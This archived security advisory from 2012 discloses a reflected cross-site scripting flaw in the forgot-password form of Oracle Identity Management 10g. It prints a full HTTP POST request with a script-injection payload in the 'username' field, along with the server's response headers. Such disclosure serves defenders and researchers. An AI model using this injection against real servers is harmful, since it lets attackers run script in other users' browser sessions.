Archive for October 4th, 2012

Oracle Identity Management 10g (username) XSS POST Injection Vulnerability

Oracle Identity Management suffers from a reflected XSS POST Injection vulnerability when parsing user input to the ‘username’ parameter via POST method thru ‘/usermanagement/forgotpassword/index.jsp’ script. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session.

HTTP Request Headers:
----------------------

POST /usermanagement/forgotpassword/index.jsp HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20100101 Firefox/15.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: JSESSIONID=996b1e1dbc2cdec0e74c96f440780cfce507dce8144.e3eKa3
iTaN0Le34RaNuLb3yKchn0n6jAmljGr5XDqQLvpAe; ORA_WX_SESSION="6F35B41473025957B17F02F62855B522D4E22D7B-1#2";
Location=external; portal=9.0.3+en-us+us+AMERICA+CACA1F130AE0024EE043996B1DDC024E+
4D3F611B686669BF0BEC9DC4267652AC337EA1C5259A2168CF43540DE72E3BD5E
F1F589B40A6CD4E7007EB4D085EBD0681A1B2515CB22B5BED14922088
923D86B742E69FDA5D716C437D416C5F5B26049DC71083712AA9EA;
MODPLSQL_TRC=ReqId:11a179::PID:856d5bb0

btnSubmit=SUBMIT
username="><script>alert('XSS');</script>

HTTP Response Headers:
-----------------------

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: ORA_WX_SESSION="267FB4CAD2746E946102C01D527362A070E7D52C-1#2"; path=/
JSESSIONID=996b1e1dbc2cdec0e74c96f440780cfce507dce8144.e3eKa3iTaN0
Le34RaNuLb3yKchn0n6jAmljGr5XDqQLvpAe; path=/usermanagement; secure
Location=external;path=/;
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-10g/10.1.2.2.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.2.1 (N;ecid=216172960764121113,1)
Content-Length: 3198
Date: Fri, 28 Sep 2012 21:39:00 GMT

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5110.php